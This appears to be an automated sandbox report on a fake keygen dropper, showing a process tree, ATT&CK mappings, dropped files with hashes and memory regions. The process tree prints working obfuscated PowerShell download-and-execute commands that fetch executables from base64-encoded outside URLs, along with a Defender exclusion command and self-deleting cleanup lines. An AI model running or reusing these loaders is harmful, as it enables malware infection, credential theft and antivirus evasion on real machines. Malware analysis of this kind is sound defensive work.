                    "C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe"
                    8⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Checks processor information in registry
                    PID:2840
                    • C:\Windows\SysWOW64\cmd.exe
                      "C:\Windows\System32\cmd.exe" /c taskkill /pid 2840 & erase C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe & RD /S /Q C:\\ProgramData\\030929929665585\\* & exit
                      9⤵
                        PID:2000
                        • C:\Windows\SysWOW64\taskkill.exe
                          taskkill /pid 2840
                          10⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1924
                • C:\Users\Public\sef.exe
                  "C:\Users\Public\sef.exe"
                  6⤵
                  • Executes dropped EXE
                  PID:2232
          • C:\Windows\SysWOW64\mshta.exe
            "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\A007.tmp\b1.hta"
            3⤵
            • Modifies Internet Explorer settings
            • Suspicious use of WriteProcessMemory
            PID:1576
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL ftdrmoulpbhgsc $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;ftdrmoulpbhgsc rfmngajuyepx $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|rfmngajuyepx;ftdrmoulpbhgsc hnjmzobgr $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3Bkc2hjanZudi51Zy96eGN2Yi5leGU=';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);hnjmzobgr $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
              4⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:1736
          • C:\Windows\SysWOW64\timeout.exe
            timeout 2
            3⤵
            • Delays execution with timeout.exe
            PID:1360
          • C:\Windows\SysWOW64\mshta.exe
            "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\A007.tmp\ba.hta"
            3⤵
            • Modifies Internet Explorer settings
            • Suspicious use of WriteProcessMemory
            PID:936
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL vfudzcotabjeq $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;vfudzcotabjeq urdjneqmx $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|urdjneqmx;vfudzcotabjeq wuirkcyfmgjql $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhKRA==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);wuirkcyfmgjql $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
              4⤵
              • Blocklisted process makes network request
              • Loads dropped DLL
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:1488
              • C:\Users\Public\jql.exe
                "C:\Users\Public\jql.exe"
                5⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Suspicious use of SetThreadContext
                • Suspicious behavior: MapViewOfSection
                • Suspicious use of SetWindowsHookEx
                PID:2532
                • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                  "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
                  6⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Suspicious use of SetThreadContext
                  • Suspicious behavior: MapViewOfSection
                  • Suspicious use of SetWindowsHookEx
                  PID:2620
                  • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                    "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
                    7⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Checks processor information in registry
                    PID:2772
                    • C:\Windows\SysWOW64\cmd.exe
                      "C:\Windows\System32\cmd.exe" /c taskkill /pid 2772 & erase C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe & RD /S /Q C:\\ProgramData\\491804408824910\\* & exit
                      8⤵
                        PID:2344
                        • C:\Windows\SysWOW64\taskkill.exe
                          taskkill /pid 2772
                          9⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1664
                  • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                    "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                    6⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Suspicious use of SetThreadContext
                    • Suspicious behavior: MapViewOfSection
                    • Suspicious use of SetWindowsHookEx
                    PID:2732
                    • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                      "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                      7⤵
                      • Executes dropped EXE
                      PID:2940
                  • C:\Users\Public\jql.exe
                    "C:\Users\Public\jql.exe"
                    6⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Drops desktop.ini file(s)
                    • Modifies system certificate store
                    PID:2804
                    • C:\Users\Admin\AppData\Local\Temp\sPxCwqSCeN.exe
                      "C:\Users\Admin\AppData\Local\Temp\sPxCwqSCeN.exe"
                      7⤵
                      • Executes dropped EXE
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2520
                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe
                        "Powershell" Add-MpPreference -ExclusionPath '"C:\Users\Admin\AppData\Local\Temp\sPxCwqSCeN.exe"'
                        8⤵
                        • Suspicious use of AdjustPrivilegeToken
                        PID:2260
                    • C:\Users\Admin\AppData\Local\Temp\0WdF1kPYRh.exe
                      "C:\Users\Admin\AppData\Local\Temp\0WdF1kPYRh.exe"
                      7⤵
                      • Executes dropped EXE
                      • Modifies system certificate store
                      PID:516
                      • C:\Windows\SysWOW64\Notepad.exe
                        "C:\Windows\System32\Notepad.exe"
                        8⤵
                          PID:2056
                      • C:\Users\Admin\AppData\Local\Temp\2ks8zAq1AB.exe
                        "C:\Users\Admin\AppData\Local\Temp\2ks8zAq1AB.exe"
                        7⤵
                        • Executes dropped EXE
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        • Suspicious use of SetWindowsHookEx
                        PID:1252
                        • \??\c:\windows\SysWOW64\cmstp.exe
                          "c:\windows\system32\cmstp.exe" /au C:\Windows\temp\jhpijl0e.inf
                          8⤵
                            PID:2740
                        • C:\Users\Admin\AppData\Local\Temp\K38tmZ9xRQ.exe
                          "C:\Users\Admin\AppData\Local\Temp\K38tmZ9xRQ.exe"
                          7⤵
                          • Executes dropped EXE
                          • Windows security modification
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:336
                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            "powershell" Get-MpPreference -verbose
                            8⤵
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            PID:2832
                        • C:\Windows\SysWOW64\cmd.exe
                          cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Public\jql.exe"
                          7⤵
                            PID:928
                            • C:\Windows\SysWOW64\timeout.exe
                              timeout /T 10 /NOBREAK
                              8⤵
                              • Delays execution with timeout.exe
                              PID:2816
                  • C:\Windows\SysWOW64\mshta.exe
                    "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\A007.tmp\ba1.hta"
                    3⤵
                    • Modifies Internet Explorer settings
                    • Suspicious use of WriteProcessMemory
                    PID:1240
                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL wvroy $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;wvroy bwskyfgqtipu $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|bwskyfgqtipu;wvroy shlevpgb $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3JiY3h2bmIudWcvenhjdmIuZXhl';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);shlevpgb $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                      4⤵
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:1924

              Network

              MITRE ATT&CK Matrix ATT&CK v6

              Persistence

              Modify Existing Service

              1
              T1031

              Defense Evasion

              Modify Registry

              4
              T1112

              Disabling Security Tools

              2
              T1089

              Install Root Certificate

              1
              T1130

              Credential Access

              Credentials in Files

              3
              T1081

              Discovery

              Query Registry

              2
              T1012

              System Information Discovery

              2
              T1082

              Collection

              Data from Local System

              3
              T1005

              Replay Monitor

              Loading Replay Monitor...

              Downloads

              • C:\ProgramData\MSVCP140.dll
              • C:\ProgramData\VCRUNTIME140.dll
              • C:\ProgramData\freebl3.dll
              • C:\ProgramData\freebl3.dll
              • C:\ProgramData\mozglue.dll
              • C:\ProgramData\mozglue.dll
              • C:\ProgramData\msvcp140.dll
              • C:\ProgramData\nss3.dll
                MD5

                bfac4e3c5908856ba17d41edcd455a51

                SHA1

                8eec7e888767aa9e4cca8ff246eb2aacb9170428

                SHA256

                e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

                SHA512

                2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

              • C:\ProgramData\nss3.dll
                MD5

                bfac4e3c5908856ba17d41edcd455a51

                SHA1

                8eec7e888767aa9e4cca8ff246eb2aacb9170428

                SHA256

                e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

                SHA512

                2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

              • C:\ProgramData\softokn3.dll
              • C:\ProgramData\sqlite3.dll
              • C:\ProgramData\sqlite3.dll
              • C:\ProgramData\vcruntime140.dll
              • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_1a1733a9-c78a-41f9-ba49-7e78bc3e775b
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_1dbfbd03-032a-43ee-a2a3-74ba01a4cb1a
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_35e8e4e8-499d-4f63-ac07-011130b8375a
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_476a0ca3-3c6e-4f0f-98c1-110a86eb7d6a
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_478c05f3-b801-4912-91bd-47646e127596
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_4fd4a7fe-82f5-41e4-888c-1b7eac83ece7
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_638d71a9-5345-4c51-851c-72a6822e822b
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_638d71a9-5345-4c51-851c-72a6822e822b
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_638d71a9-5345-4c51-851c-72a6822e822b
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_638d71a9-5345-4c51-851c-72a6822e822b
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_638d71a9-5345-4c51-851c-72a6822e822b
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_638d71a9-5345-4c51-851c-72a6822e822b
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_a2ebb337-3027-47ef-8098-8d2e9f7615cf
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_ca37ad88-4ce8-48e7-a2ed-ec10658dba29
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_e10aa6dc-f3ff-45e4-9eec-4fef42847693
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_e1dd9aab-0fd1-4532-ba7f-00569c2741ef
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_e7db685a-2e5c-4f26-ae23-e27dc237cfd5
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
              • C:\Users\Admin\AppData\Local\Temp\0WdF1kPYRh.exe
              • C:\Users\Admin\AppData\Local\Temp\2ks8zAq1AB.exe
              • C:\Users\Admin\AppData\Local\Temp\2ks8zAq1AB.exe
              • C:\Users\Admin\AppData\Local\Temp\A007.tmp\Keygen.exe
              • C:\Users\Admin\AppData\Local\Temp\A007.tmp\Keygen.exe
              • C:\Users\Admin\AppData\Local\Temp\A007.tmp\b.hta
              • C:\Users\Admin\AppData\Local\Temp\A007.tmp\b1.hta
              • C:\Users\Admin\AppData\Local\Temp\A007.tmp\ba.hta
              • C:\Users\Admin\AppData\Local\Temp\A007.tmp\ba1.hta
              • C:\Users\Admin\AppData\Local\Temp\A007.tmp\m.hta
              • C:\Users\Admin\AppData\Local\Temp\A007.tmp\m1.hta
              • C:\Users\Admin\AppData\Local\Temp\A007.tmp\start.bat
              • C:\Users\Admin\AppData\Local\Temp\Coctuoidu.vbs
              • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
              • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
              • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
              • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
              • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
              • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
              • C:\Users\Admin\AppData\Local\Temp\K38tmZ9xRQ.exe
              • C:\Users\Admin\AppData\Local\Temp\K38tmZ9xRQ.exe
              • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
              • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
              • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
              • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
              • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
              • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
              • C:\Users\Admin\AppData\Local\Temp\Rarujmxnv.vbs
              • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
              • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
              • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
              • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
              • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
              • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
              • C:\Users\Admin\AppData\Local\Temp\sPxCwqSCeN.exe
              • C:\Users\Admin\AppData\Local\Temp\sPxCwqSCeN.exe
              • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
              • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
              • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
              • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
              • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
              • C:\Users\Public\jql.exe
              • C:\Users\Public\jql.exe
              • C:\Users\Public\jql.exe
              • C:\Users\Public\sef.exe
              • C:\Users\Public\sef.exe
              • C:\Users\Public\sef.exe
              • C:\Users\Public\wib.exe
              • C:\Users\Public\wib.exe
              • C:\Users\Public\wib.exe
              • C:\Windows\temp\jhpijl0e.inf
              • \??\PIPE\lsarpc
              • \??\PIPE\srvsvc
              • \??\PIPE\srvsvc
              • \??\PIPE\srvsvc
              • \ProgramData\mozglue.dll
              • \ProgramData\mozglue.dll
              • \ProgramData\mozglue.dll
              • \ProgramData\msvcp140.dll
              • \ProgramData\msvcp140.dll
              • \ProgramData\msvcp140.dll
              • \ProgramData\nss3.dll
                MD5

                bfac4e3c5908856ba17d41edcd455a51

                SHA1

                8eec7e888767aa9e4cca8ff246eb2aacb9170428

                SHA256

                e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

                SHA512

                2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

              • \ProgramData\nss3.dll
                MD5

                bfac4e3c5908856ba17d41edcd455a51

                SHA1

                8eec7e888767aa9e4cca8ff246eb2aacb9170428

                SHA256

                e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

                SHA512

                2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

              • \ProgramData\nss3.dll
                MD5

                bfac4e3c5908856ba17d41edcd455a51

                SHA1

                8eec7e888767aa9e4cca8ff246eb2aacb9170428

                SHA256

                e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

                SHA512

                2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

              • \ProgramData\sqlite3.dll
              • \ProgramData\sqlite3.dll
              • \ProgramData\sqlite3.dll
              • \ProgramData\vcruntime140.dll
              • \ProgramData\vcruntime140.dll
              • \ProgramData\vcruntime140.dll
              • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\freebl3.dll
              • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\freebl3.dll
              • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\mozglue.dll
              • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\msvcp140.dll
              • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\nss3.dll
                MD5

                02cc7b8ee30056d5912de54f1bdfc219

                SHA1

                a6923da95705fb81e368ae48f93d28522ef552fb

                SHA256

                1989526553fd1e1e49b0fea8036822ca062d3d39c4cab4a37846173d0f1753d5

                SHA512

                0d5dfcf4fb19b27246fa799e339d67cd1b494427783f379267fb2d10d615ffb734711bab2c515062c078f990a44a36f2d15859b1dacd4143dcc35b5c0cee0ef5

              • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\softokn3.dll
              • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\vcruntime140.dll
              • \Users\Admin\AppData\LocalLow\sqlite3.dll
              • \Users\Admin\AppData\Local\Temp\0WdF1kPYRh.exe
              • \Users\Admin\AppData\Local\Temp\0WdF1kPYRh.exe
              • \Users\Admin\AppData\Local\Temp\2ks8zAq1AB.exe
              • \Users\Admin\AppData\Local\Temp\A007.tmp\Keygen.exe
              • \Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
              • \Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
              • \Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
              • \Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
              • \Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
              • \Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
              • \Users\Admin\AppData\Local\Temp\K38tmZ9xRQ.exe
              • \Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
              • \Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
              • \Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
              • \Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
              • \Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
              • \Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
              • \Users\Admin\AppData\Local\Temp\axcsdfa.exe
              • \Users\Admin\AppData\Local\Temp\axcsdfa.exe
              • \Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
              • \Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
              • \Users\Admin\AppData\Local\Temp\sPxCwqSCeN.exe
              • \Users\Public\jql.exe
              • \Users\Public\jql.exe
              • \Users\Public\sef.exe
              • \Users\Public\wib.exe
              • \Users\Public\wib.exe
              • memory/296-223-0x0000000000417A8B-mapping.dmp
              • memory/336-355-0x0000000000280000-0x0000000000291000-memory.dmp
                Filesize

                68KB

              • memory/336-347-0x00000000727A0000-0x0000000072E8E000-memory.dmp
                Filesize

                6.9MB

              • memory/336-353-0x0000000000270000-0x0000000000271000-memory.dmp
                Filesize

                4KB

              • memory/336-357-0x0000000000310000-0x0000000000313000-memory.dmp
                Filesize

                12KB

              • memory/336-358-0x0000000004CB0000-0x0000000004CB2000-memory.dmp
                Filesize

                8KB

              • memory/336-343-0x0000000000000000-mapping.dmp
              • memory/336-350-0x0000000000320000-0x0000000000321000-memory.dmp
                Filesize

                4KB

              • memory/516-389-0x0000000004480000-0x00000000044CC000-memory.dmp
                Filesize

                304KB

              • memory/516-334-0x0000000000000000-mapping.dmp
              • memory/928-345-0x0000000000000000-mapping.dmp
              • memory/936-27-0x0000000000000000-mapping.dmp
              • memory/1056-18-0x0000000000000000-mapping.dmp
              • memory/1056-305-0x0000000000400000-0x0000000000420000-memory.dmp
                Filesize

                128KB

              • memory/1056-306-0x000000000041A684-mapping.dmp
              • memory/1056-23-0x0000000070120000-0x000000007080E000-memory.dmp
                Filesize

                6.9MB

              • memory/1056-308-0x0000000000400000-0x0000000000420000-memory.dmp
                Filesize

                128KB

              • memory/1236-191-0x0000000000000000-mapping.dmp
              • memory/1236-209-0x0000000002790000-0x0000000002794000-memory.dmp
                Filesize

                16KB

              • memory/1240-29-0x0000000000000000-mapping.dmp
              • memory/1252-348-0x00000000012E0000-0x00000000012E1000-memory.dmp
                Filesize

                4KB

              • memory/1252-341-0x00000000727A0000-0x0000000072E8E000-memory.dmp
                Filesize

                6.9MB

              • memory/1252-370-0x0000000000470000-0x0000000000475000-memory.dmp
                Filesize

                20KB

              • memory/1252-354-0x0000000000200000-0x0000000000201000-memory.dmp
                Filesize

                4KB

              • memory/1252-356-0x0000000000440000-0x0000000000452000-memory.dmp
                Filesize

                72KB

              • memory/1252-338-0x0000000000000000-mapping.dmp
              • memory/1252-372-0x00000000003A0000-0x00000000003B0000-memory.dmp
                Filesize

                64KB

              • memory/1360-16-0x0000000000000000-mapping.dmp
              • memory/1488-36-0x0000000002580000-0x0000000002581000-memory.dmp
                Filesize

                4KB

              • memory/1488-30-0x0000000000000000-mapping.dmp
              • memory/1488-34-0x0000000070120000-0x000000007080E000-memory.dmp
                Filesize

                6.9MB

              • memory/1576-15-0x0000000000000000-mapping.dmp
              • memory/1604-13-0x0000000000000000-mapping.dmp
              • memory/1664-301-0x0000000000000000-mapping.dmp
              • memory/1664-401-0x000000000041A684-mapping.dmp
              • memory/1736-68-0x0000000006320000-0x0000000006321000-memory.dmp
                Filesize

                4KB

              • memory/1736-75-0x00000000063D0000-0x00000000063D1000-memory.dmp
                Filesize

                4KB

              • memory/1736-193-0x0000000006650000-0x0000000006651000-memory.dmp
                Filesize

                4KB

              • memory/1736-62-0x0000000006170000-0x0000000006171000-memory.dmp
                Filesize

                4KB

              • memory/1736-20-0x0000000000000000-mapping.dmp
              • memory/1736-135-0x00000000064D0000-0x00000000064D1000-memory.dmp
                Filesize

